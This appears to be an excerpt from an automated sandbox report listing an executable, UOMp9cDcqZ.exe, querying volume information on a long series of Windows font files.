Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
